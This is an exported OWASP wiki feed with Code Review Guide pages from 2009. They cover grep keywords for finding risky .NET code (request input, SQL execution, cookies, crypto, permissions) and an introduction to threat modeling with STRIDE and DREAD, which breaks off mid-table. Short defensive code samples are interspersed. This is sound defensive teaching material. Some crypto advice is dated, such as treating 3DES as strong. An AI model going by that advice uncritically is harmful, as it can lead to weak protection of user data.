*[[Reviewing Code for Data Validation]]&lt;br /&gt;
Data validation of all external input must be performed. This also goes for authentication fields.&lt;br /&gt;
*[[Reviewing code for XSS issues]]&lt;br /&gt;
Cross-site scripting can be used on the authentication page to perform identity theft, phishing, and session-hijacking attacks.&lt;br /&gt;
*[[Reviewing Code for Error Handling]]&lt;br /&gt;
Bad or weak error handling can be used to establish the internal workings of the authentication functionality, such as giving insight into the database structure or into valid and invalid user IDs.&lt;br /&gt;
*[[Hashing Java|Hashing with Java]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Crawling_Code&amp;diff=60152</id>
		<title>Crawling Code</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Crawling_Code&amp;diff=60152"/>
				<updated>2009-05-05T11:36:50Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Searching for Code in .NET */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Crawling code is the practice of scanning the code base of the review target in question. It is, in effect, looking for key pointers wherein a possible security vulnerability might reside. Certain APIs relate to interfacing with the external world, file IO, or user management, which are key areas for an attacker to focus on. In crawling code we look for APIs relating to these areas. We also need to look for business logic areas which may cause security issues, but generally these are bespoke methods with bespoke names and cannot be detected directly, even though we may touch on certain methods due to their relationship with a key API. &lt;br /&gt;
&lt;br /&gt;
We also need to look for common issues relating to a specific language; issues that may not be security related but which may affect the stability or availability of the application in extraordinary circumstances. Other issues to consider when performing a code review include areas such as a simple copyright notice to protect one’s intellectual property. &lt;br /&gt;
&lt;br /&gt;
Crawling code can be done manually or in an automated fashion using automated tools. Tools as simple as grep or wingrep can be used. Other tools are available which would search for key words relating to a specific programming language. &lt;br /&gt;
&lt;br /&gt;
The following sections cover crawling code for Java/J2EE, .NET, and Classic ASP.  This section is best used in conjunction with the [[Security Code Review Coverage|transactional analysis]] section also detailed in this guide.&lt;br /&gt;
&lt;br /&gt;
==Searching for Key Indicators== &lt;br /&gt;
The basis of the code review is to locate and analyse areas of code which may have application security implications. Assuming the code reviewer has a thorough understanding of the code, what it is intended to do, and the context in which it is used, the first step is to sweep the code base for areas of interest. &lt;br /&gt;
&lt;br /&gt;
This can be done by performing a text search on the code base, looking for keywords relating to APIs and functions. Below is a guide for .NET Framework 1.1 &amp;amp; 2.0. &lt;br /&gt;
&lt;br /&gt;
==Searching for Code in .NET== &lt;br /&gt;
Firstly, one needs to be familiar with the tools available for text searching; secondly, one needs to know what to look for. &lt;br /&gt;
&lt;br /&gt;
In this section we will assume you have a copy of Visual Studio (VS) .NET at hand. VS has two types of search: &amp;quot;Find in Files&amp;quot; and a command-line tool called findstr.&lt;br /&gt;
&lt;br /&gt;
The text search tool in Windows XP is not great in my experience; if one has to use it, make sure SP2 is installed, as it works better. To start off, one should scan through the code looking for common patterns or keywords such as &amp;quot;User&amp;quot;, &amp;quot;Password&amp;quot;, &amp;quot;Pswd&amp;quot;, &amp;quot;Key&amp;quot;, &amp;quot;Http&amp;quot;, etc. This can be done using the &amp;quot;Find in Files&amp;quot; tool in VS or using findstr as follows: &lt;br /&gt;
&lt;br /&gt;
findstr /s /m /i /d:c:\projects\codebase\sec &amp;quot;http&amp;quot; *.*&lt;br /&gt;
&lt;br /&gt;
==HTTP Request Strings==&lt;br /&gt;
Requests from external sources are obviously a key area of a security code review. We need to ensure that all HTTP requests received are validated for composition, maximum and minimum length, and whether the data falls within the parameter white-list. The bottom line is that this is a key area to look at to ensure security is enabled. &lt;br /&gt;
&lt;br /&gt;
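As a sketch of such server-side checks (written in Java to match the guide's other samples; InputValidator is a hypothetical helper, not an ASP.NET API):&lt;br /&gt;

```java
public class InputValidator {
    // Hypothetical helper illustrating the checks described above:
    // composition (white-list pattern), minimum and maximum length.
    public static boolean isValid(String value, int min, int max, String allowedPattern) {
        if (value == null) return false;
        int len = value.length();
        if (len >= min) {
            if (len > max) return false;
            return value.matches(allowedPattern);
        }
        return false;
    }
}
```
&lt;br /&gt;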
request.accepttypes&amp;lt;br&amp;gt;&lt;br /&gt;
request.browser&amp;lt;br&amp;gt;&lt;br /&gt;
request.files&amp;lt;br&amp;gt;&lt;br /&gt;
request.headers&amp;lt;br&amp;gt;&lt;br /&gt;
request.httpmethod&amp;lt;br&amp;gt;&lt;br /&gt;
request.item&amp;lt;br&amp;gt;&lt;br /&gt;
request.querystring&amp;lt;br&amp;gt;&lt;br /&gt;
request.form &amp;lt;br&amp;gt;&lt;br /&gt;
request.cookies&amp;lt;br&amp;gt;&lt;br /&gt;
request.certificate&amp;lt;br&amp;gt;&lt;br /&gt;
request.rawurl&amp;lt;br&amp;gt;&lt;br /&gt;
request.servervariables&amp;lt;br&amp;gt;&lt;br /&gt;
request.url&amp;lt;br&amp;gt;&lt;br /&gt;
request.urlreferrer&amp;lt;br&amp;gt;&lt;br /&gt;
request.useragent&amp;lt;br&amp;gt;&lt;br /&gt;
request.userlanguages&amp;lt;br&amp;gt;&lt;br /&gt;
request.IsSecureConnection&amp;lt;br&amp;gt;&lt;br /&gt;
request.TotalBytes&amp;lt;br&amp;gt;&lt;br /&gt;
request.BinaryRead&amp;lt;br&amp;gt;&lt;br /&gt;
InputStream&amp;lt;br&amp;gt;&lt;br /&gt;
HiddenField.Value&amp;lt;br&amp;gt;&lt;br /&gt;
TextBox.Text&amp;lt;br&amp;gt;&lt;br /&gt;
recordSet&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==HTML Output==&lt;br /&gt;
Here we are looking for responses to the client. Responses which go unvalidated, or which echo external input without data validation, are key areas to examine. Many client-side attacks result from poor response validation; cross-site scripting (XSS) in particular relies on this. &lt;br /&gt;
&lt;br /&gt;
response.write &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;% = &amp;lt;br&amp;gt;&lt;br /&gt;
HttpUtility &amp;lt;br&amp;gt;&lt;br /&gt;
HtmlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
UrlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
innerText &amp;lt;br&amp;gt;&lt;br /&gt;
innerHTML &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==SQL &amp;amp; Database==&lt;br /&gt;
Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine if the application is vulnerable to SQL injection. One aspect of this is to verify that the code uses SqlParameter, OleDbParameter, or OdbcParameter (from the System.Data.SqlClient, System.Data.OleDb, and System.Data.Odbc namespaces respectively). These are typed and treat parameters as literal values, not as executable code in the database. &lt;br /&gt;
&lt;br /&gt;
exec sp_executesql &amp;lt;br&amp;gt;&lt;br /&gt;
execute sp_executesql &amp;lt;br&amp;gt;&lt;br /&gt;
select from &amp;lt;br&amp;gt;&lt;br /&gt;
Insert &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
update &amp;lt;br&amp;gt;&lt;br /&gt;
delete from where &amp;lt;br&amp;gt;&lt;br /&gt;
delete &amp;lt;br&amp;gt;&lt;br /&gt;
exec sp_ &amp;lt;br&amp;gt;&lt;br /&gt;
execute sp_ &amp;lt;br&amp;gt;&lt;br /&gt;
exec xp_ &amp;lt;br&amp;gt;&lt;br /&gt;
execute xp_ &amp;lt;br&amp;gt;&lt;br /&gt;
exec @ &amp;lt;br&amp;gt;&lt;br /&gt;
execute @ &amp;lt;br&amp;gt;&lt;br /&gt;
executestatement &amp;lt;br&amp;gt;&lt;br /&gt;
executeSQL &amp;lt;br&amp;gt;&lt;br /&gt;
setfilter &amp;lt;br&amp;gt;&lt;br /&gt;
executeQuery &amp;lt;br&amp;gt;&lt;br /&gt;
GetQueryResultInXML &amp;lt;br&amp;gt;&lt;br /&gt;
adodb &amp;lt;br&amp;gt;&lt;br /&gt;
sqloledb &amp;lt;br&amp;gt;&lt;br /&gt;
sql server &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
driver &amp;lt;br&amp;gt;&lt;br /&gt;
Server.CreateObject &amp;lt;br&amp;gt;&lt;br /&gt;
.Provider &amp;lt;br&amp;gt;&lt;br /&gt;
.Open &amp;lt;br&amp;gt;&lt;br /&gt;
ADODB.recordset &amp;lt;br&amp;gt;&lt;br /&gt;
New OleDbConnection &amp;lt;br&amp;gt;&lt;br /&gt;
ExecuteReader &amp;lt;br&amp;gt;&lt;br /&gt;
DataSource &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
SqlCommand &amp;lt;br&amp;gt;&lt;br /&gt;
Microsoft.Jet &amp;lt;br&amp;gt;&lt;br /&gt;
SqlDataReader &amp;lt;br&amp;gt;&lt;br /&gt;
ExecuteReader &amp;lt;br&amp;gt;&lt;br /&gt;
GetString &amp;lt;br&amp;gt;&lt;br /&gt;
SqlDataAdapter &amp;lt;br&amp;gt; &lt;br /&gt;
CommandType &amp;lt;br&amp;gt;&lt;br /&gt;
StoredProcedure &amp;lt;br&amp;gt;&lt;br /&gt;
System.Data.sql &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cookies==&lt;br /&gt;
Cookie manipulation can be key to various application security exploits, such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionality, as this would have a bearing on session security. &lt;br /&gt;
&lt;br /&gt;
System.Net.Cookie &amp;lt;br&amp;gt;&lt;br /&gt;
HTTPOnly &amp;lt;br&amp;gt;&lt;br /&gt;
document.cookie &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==HTML Tags==&lt;br /&gt;
Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display and use of such tags within a web application. &lt;br /&gt;
&lt;br /&gt;
HtmlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
URLEncode &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;applet&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frameset&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;embed&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frame&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;iframe&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;img&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;layer&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;ilayer&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;meta&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;object&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frame security &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;iframe security &amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
==Input Controls==&lt;br /&gt;
The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application. &lt;br /&gt;
&lt;br /&gt;
system.web.ui.htmlcontrols.htmlinputhidden&lt;br /&gt;
system.web.ui.webcontrols.hiddenfield&lt;br /&gt;
system.web.ui.webcontrols.hyperlink&lt;br /&gt;
system.web.ui.webcontrols.textbox&lt;br /&gt;
system.web.ui.webcontrols.label&lt;br /&gt;
system.web.ui.webcontrols.linkbutton&lt;br /&gt;
system.web.ui.webcontrols.listbox&lt;br /&gt;
system.web.ui.webcontrols.checkboxlist&lt;br /&gt;
system.web.ui.webcontrols.dropdownlist&lt;br /&gt;
&lt;br /&gt;
==WEB.Config==&lt;br /&gt;
The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application’s root directory. For ASP.NET applications, web.config contains information about most aspects of the application’s operation. &lt;br /&gt;
&lt;br /&gt;
requestEncoding &amp;lt;br&amp;gt;&lt;br /&gt;
responseEncoding &amp;lt;br&amp;gt;&lt;br /&gt;
trace &amp;lt;br&amp;gt;&lt;br /&gt;
authorization &amp;lt;br&amp;gt;&lt;br /&gt;
compilation &amp;lt;br&amp;gt;&lt;br /&gt;
CustomErrors &amp;lt;br&amp;gt;&lt;br /&gt;
httpCookies &amp;lt;br&amp;gt;&lt;br /&gt;
httpHandlers &amp;lt;br&amp;gt;&lt;br /&gt;
httpRuntime &amp;lt;br&amp;gt;&lt;br /&gt;
sessionState &amp;lt;br&amp;gt;&lt;br /&gt;
maxRequestLength &amp;lt;br&amp;gt;&lt;br /&gt;
debug &amp;lt;br&amp;gt;&lt;br /&gt;
forms protection &amp;lt;br&amp;gt;&lt;br /&gt;
appSettings &amp;lt;br&amp;gt;&lt;br /&gt;
ConfigurationSettings &amp;lt;br&amp;gt;&lt;br /&gt;
appSettings &amp;lt;br&amp;gt;&lt;br /&gt;
connectionStrings &amp;lt;br&amp;gt;&lt;br /&gt;
authentication mode &amp;lt;br&amp;gt;&lt;br /&gt;
allow &amp;lt;br&amp;gt;&lt;br /&gt;
deny &amp;lt;br&amp;gt;&lt;br /&gt;
credentials &amp;lt;br&amp;gt;&lt;br /&gt;
identity impersonate &amp;lt;br&amp;gt;&lt;br /&gt;
timeout &amp;lt;br&amp;gt;&lt;br /&gt;
remote &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==global.asax==&lt;br /&gt;
Each application has its own Global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it. &lt;br /&gt;
&lt;br /&gt;
Application_OnAuthenticateRequest &amp;lt;br&amp;gt;&lt;br /&gt;
Application_OnAuthorizeRequest &amp;lt;br&amp;gt;&lt;br /&gt;
Session_OnStart &amp;lt;br&amp;gt;&lt;br /&gt;
Session_OnEnd &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logging==&lt;br /&gt;
Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine whether any sensitive information is being logged. Common mistakes are logging the userID in conjunction with the password within the authentication functionality, or logging database requests which may contain sensitive data. &lt;br /&gt;
&lt;br /&gt;
log4net &amp;lt;br&amp;gt;&lt;br /&gt;
Console.WriteLine &amp;lt;br&amp;gt;&lt;br /&gt;
System.Diagnostics.Debug &amp;lt;br&amp;gt;&lt;br /&gt;
System.Diagnostics.Trace &amp;lt;br&amp;gt;&lt;br /&gt;
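One common mitigation for the mistake described above is to redact credentials before they reach any log sink. A minimal sketch in Python (the field name pattern "password=" is a hypothetical convention, not something the guide prescribes):

```python
# A logging filter that redacts password values from log messages
# before any handler writes them out.
import logging
import re

class RedactPasswords(logging.Filter):
    PATTERN = re.compile(r"(password=)\S+", re.IGNORECASE)

    def filter(self, record):
        record.msg = self.PATTERN.sub(r"\1[REDACTED]", str(record.msg))
        return True  # keep the record, just with the secret scrubbed

logger = logging.getLogger("auth")
logger.addFilter(RedactPasswords())
logger.warning("login failed for user=alice password=hunter2")
```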
&lt;br /&gt;
==Machine.config==&lt;br /&gt;
It is important to note that many settings in machine.config can be overridden in the web.config file for a particular application. &lt;br /&gt;
&lt;br /&gt;
validateRequest  &amp;lt;br&amp;gt;&lt;br /&gt;
enableViewState &amp;lt;br&amp;gt;&lt;br /&gt;
enableViewStateMac &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Threads and Concurrency==&lt;br /&gt;
Locate code that contains multithreaded functions. Concurrency issues can result in race conditions, which may in turn result in security vulnerabilities. The Thread keyword indicates where new thread objects are created. Code that uses static global variables to hold sensitive security information may cause session issues. Code that uses static constructors may also cause issues between threads. If the Dispose method is not synchronized, a number of threads calling Dispose at the same time may cause resource release issues. &lt;br /&gt;
&lt;br /&gt;
Thread &amp;lt;br&amp;gt;&lt;br /&gt;
Dispose &amp;lt;br&amp;gt;&lt;br /&gt;
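The race condition described above can be sketched in any language: an unsynchronized read-modify-write on shared state is unsafe under concurrency. A minimal illustrative example in Python (the guide's context is .NET threads, but the principle is identical):

```python
# Protect shared state with a lock so concurrent threads cannot
# interleave the read-modify-write sequence.
import threading

counter = 0
lock = threading.Lock()

def increment(times):
    global counter
    for _ in range(times):
        with lock:        # serialize the read-modify-write
            counter += 1

threads = [threading.Thread(target=increment, args=(10_000,)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter)  # deterministically 40000 only because of the lock
```

Without the lock, the final count would intermittently fall short of 40000; the same hazard applies to an unsynchronized Dispose called from multiple threads.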
 &lt;br /&gt;
==Class Design==&lt;br /&gt;
Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure any public class fields are public for a reason; don't expose anything you don't need to. &lt;br /&gt;
&lt;br /&gt;
Public &amp;lt;br&amp;gt;&lt;br /&gt;
Sealed &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reflection, Serialization==&lt;br /&gt;
Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data, does it need to be serialized?&lt;br /&gt;
&lt;br /&gt;
Serializable &amp;lt;br&amp;gt;&lt;br /&gt;
AllowPartiallyTrustedCallersAttribute &amp;lt;br&amp;gt;&lt;br /&gt;
GetObjectData  &amp;lt;br&amp;gt;&lt;br /&gt;
StrongNameIdentityPermission &amp;lt;br&amp;gt;&lt;br /&gt;
StrongNameIdentity &amp;lt;br&amp;gt;&lt;br /&gt;
System.Reflection &amp;lt;br&amp;gt;&lt;br /&gt;
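The serialization question above ("does sensitive data need to be serialized?") can be answered in code by excluding secret fields from serialized state. An illustrative Python sketch, analogous in spirit to excluding a field inside GetObjectData (class and field names are hypothetical):

```python
# Keep a sensitive field out of serialized state by overriding
# __getstate__/__setstate__.
import pickle

class Credentials:
    def __init__(self, username, password):
        self.username = username
        self.password = password

    def __getstate__(self):
        state = self.__dict__.copy()
        state.pop("password")        # never persist the secret
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        self.password = None         # must be re-entered after loading

restored = pickle.loads(pickle.dumps(Credentials("alice", "s3cret")))
print(restored.username, restored.password)
```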
&lt;br /&gt;
==Exceptions &amp;amp; Errors==&lt;br /&gt;
Ensure that catch blocks do not leak information to the user in the case of an exception. Ensure that the finally block is used when dealing with resources. Having trace enabled can lead to information leakage. Ensure customised errors are properly implemented. &lt;br /&gt;
&lt;br /&gt;
catch{ &amp;lt;br&amp;gt;&lt;br /&gt;
Finally &amp;lt;br&amp;gt;&lt;br /&gt;
trace enabled &amp;lt;br&amp;gt;&lt;br /&gt;
customErrors mode &amp;lt;br&amp;gt;&lt;br /&gt;
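The two rules above (no detail leaks to the user; resources released in finally) can be sketched together. An illustrative Python example, with the function name and generic message being hypothetical:

```python
# Log full exception detail server-side, return only a generic message
# to the user, and release the resource on every path via finally.
import logging

def read_config(path):
    handle = None
    try:
        handle = open(path)
        return handle.read()
    except OSError:
        logging.exception("config read failed")  # full detail stays server-side
        return "An internal error occurred."     # nothing leaks to the user
    finally:
        if handle is not None:
            handle.close()                       # released on all paths
```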
&lt;br /&gt;
==Crypto==&lt;br /&gt;
If cryptography is used, is a strong enough cipher used, e.g. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &amp;quot;random enough&amp;quot;? &lt;br /&gt;
&lt;br /&gt;
RNGCryptoServiceProvider &amp;lt;br&amp;gt;&lt;br /&gt;
SHA &amp;lt;br&amp;gt;&lt;br /&gt;
MD5 &amp;lt;br&amp;gt;&lt;br /&gt;
base64 &amp;lt;br&amp;gt;&lt;br /&gt;
xor &amp;lt;br&amp;gt;&lt;br /&gt;
DES &amp;lt;br&amp;gt;&lt;br /&gt;
RC2 &amp;lt;br&amp;gt;&lt;br /&gt;
System.Random &amp;lt;br&amp;gt;&lt;br /&gt;
Random &amp;lt;br&amp;gt;&lt;br /&gt;
System.Security.Cryptography &amp;lt;br&amp;gt;&lt;br /&gt;
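The password-hashing and randomness questions above can be made concrete. An illustrative Python sketch: the secrets module plays the role of RNGCryptoServiceProvider, and a salted key-derivation function stands in for bare SHA (the iteration count shown is an arbitrary example):

```python
# Salted password hashing with a KDF, plus a cryptographically strong
# random salt and a constant-time comparison for verification.
import hashlib
import secrets

def hash_password(password):
    salt = secrets.token_bytes(16)   # CSPRNG, not random.Random
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return secrets.compare_digest(candidate, digest)  # constant-time compare

salt, digest = hash_password("correct horse")
print(verify("correct horse", salt, digest))
```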
&lt;br /&gt;
==Storage==&lt;br /&gt;
If storing sensitive data in memory, consider using the following classes. &lt;br /&gt;
&lt;br /&gt;
SecureString &amp;lt;br&amp;gt;&lt;br /&gt;
ProtectedMemory &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Authorization, Assert &amp;amp; Revert==&lt;br /&gt;
Bypassing code access security permissions is not a good idea. Below is a list of potentially dangerous permissions, such as those for calling unmanaged code outside the CLR. &lt;br /&gt;
&lt;br /&gt;
.RequestMinimum &amp;lt;br&amp;gt;&lt;br /&gt;
.RequestOptional &amp;lt;br&amp;gt;&lt;br /&gt;
Assert &amp;lt;br&amp;gt;&lt;br /&gt;
Debug.Assert &amp;lt;br&amp;gt;&lt;br /&gt;
CodeAccessPermission &amp;lt;br&amp;gt;&lt;br /&gt;
ReflectionPermission.MemberAccess &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlAppDomain &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.UnmanagedCode &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.SkipVerification &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlEvidence &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.SerializationFormatter &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlPrincipal &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlDomainPolicy &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlPolicy &amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
==Legacy Methods==&lt;br /&gt;
printf &amp;lt;br&amp;gt;&lt;br /&gt;
strcpy &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60054</id>
		<title>Application Threat Modeling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60054"/>
				<updated>2009-05-04T17:14:22Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security Controls */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Introduction===&lt;br /&gt;
Threat modeling is an approach for analyzing the security of an application. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system, allowing the reviewer to see where the entry points to the application are and the threats associated with each entry point. The concept of threat modeling is not new, but there has been a clear mindset change in recent years. Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's viewpoint. Microsoft have been strong advocates of the process over the past number of years. They have made threat modeling a core component of their SDLC, which they claim to be one of the reasons for the increased security of their products in recent years. &lt;br /&gt;
&lt;br /&gt;
When source code analysis is performed outside the SDLC, such as on existing applications, the results of the threat modeling help to reduce the complexity of the source code analysis by promoting a depth-first approach over a breadth-first approach. Instead of reviewing all source code with equal focus, you can prioritize the security code review of components that threat modeling has ranked as having high-risk threats. &lt;br /&gt;
&lt;br /&gt;
The threat modeling process can be decomposed into 3 high level steps:&lt;br /&gt;
&lt;br /&gt;
'''Step 1:''' Decompose the Application. &lt;br /&gt;
The first step in the threat modeling process is concerned with gaining an understanding of the application and how it interacts with external entities. This involves creating use-cases to understand how the application is used, identifying entry points to see where a potential attacker could interact with the application, identifying assets i.e. items/areas that the attacker would be interested in, and identifying trust levels which represent the access rights that the application will grant to external entities. This information is documented in the Threat Model document and it is also used to produce data flow diagrams (DFDs) for the application. The DFDs show the different paths through the system, highlighting the privilege boundaries. &lt;br /&gt;
&lt;br /&gt;
'''Step 2:''' Determine and rank threats.&lt;br /&gt;
Critical to the identification of threats is using a threat categorization methodology. A threat categorization such as STRIDE can be used, or the Application Security Frame (ASF) that defines threat categories such as Auditing &amp;amp; Logging, Authentication, Authorization, Configuration Management, Data Protection in Storage and Transit, Data Validation, Exception Management. The goal of the threat categorization is to help identify threats both from the attacker (STRIDE) and the defensive perspective (ASF). DFDs produced in step 1 help to identify the potential threat targets from the attacker's perspective, such as data sources, processes, data flows, and interactions with users. These threats can be identified further as the roots for threat trees; there is one tree for each threat goal. From the defensive perspective, ASF categorization helps to identify the threats as weaknesses of security controls for such threats. Common threat-lists with examples can help in the identification of such threats. Use and abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. The determination of the security risk for each threat can be determined using a value-based risk model such as DREAD or a less subjective qualitative risk model based upon general risk factors (e.g. likelihood and impact).&lt;br /&gt;
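Risk models such as DREAD rank a threat by scoring several factors and combining them. An illustrative Python sketch of DREAD-style scoring (the threat names and scores below are hypothetical, chosen only to show the mechanics):

```python
# DREAD-style ranking: score five factors per threat, average them,
# then sort threats from highest to lowest risk.
def dread_score(damage, reproducibility, exploitability,
                affected_users, discoverability):
    return (damage + reproducibility + exploitability
            + affected_users + discoverability) / 5

threats = {
    "SQL injection in login form": dread_score(3, 3, 2, 3, 2),
    "Verbose error pages": dread_score(1, 3, 1, 2, 3),
}
ranked = sorted(threats.items(), key=lambda item: item[1], reverse=True)
for name, score in ranked:
    print(f"{score:.1f}  {name}")
```

The resulting ordering is what drives the prioritization of mitigation effort in step 3.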
&lt;br /&gt;
'''Step 3:''' Determine countermeasures and mitigation.&lt;br /&gt;
A lack of protection against a threat might indicate a vulnerability whose risk exposure could be mitigated with the implementation of a countermeasure. Such countermeasures can be identified using threat-countermeasure mapping lists. Once a risk ranking is assigned to the threats, it is possible to sort threats from the highest to the lowest risk and to prioritize the mitigation effort, such as by responding to such threats by applying the identified countermeasures. The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing the risk. Other options might include accepting the risk, assuming the business impact is acceptable because of compensating controls, informing the user of the threat, removing the risk posed by the threat completely, or the least preferable option: doing nothing. &lt;br /&gt;
&lt;br /&gt;
Each of the above steps is documented as it is carried out. The resulting document is the threat model for the application. This guide will use an example to help explain the concepts behind threat modeling. The same example will be used throughout each of the 3 steps as a learning aid. The example that will be used is a college library website. At the end of the guide we will have produced the threat model for the college library website. Each of the steps in the threat modeling process is described in detail below.&lt;br /&gt;
&lt;br /&gt;
== Decompose the Application ==&lt;br /&gt;
The goal of this step is to gain an understanding of the application and how it interacts with external entities. This goal is achieved by information gathering and documentation. The information gathering process is carried out using a clearly defined structure, which ensures the correct information is collected. This structure also defines how the information should be documented to produce the Threat Model. &lt;br /&gt;
&lt;br /&gt;
==Threat Model Information==&lt;br /&gt;
The first item in the threat model is the information relating to the threat model. &lt;br /&gt;
This must include the following:&lt;br /&gt;
&lt;br /&gt;
# '''Application Name''' - The name of the application.&lt;br /&gt;
# '''Application Version''' - The version of the application.&lt;br /&gt;
# '''Description''' - A high level description of the application.&lt;br /&gt;
# '''Document Owner''' - The owner of the threat modeling document. &lt;br /&gt;
# '''Participants''' - The participants involved in the threat modeling process for this application.&lt;br /&gt;
# '''Reviewer''' - The reviewer(s) of the threat model.&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Category:FIXME|the list above includes an Application name, but the example does not have one]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Threat Model Information&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Application Version:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.0&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
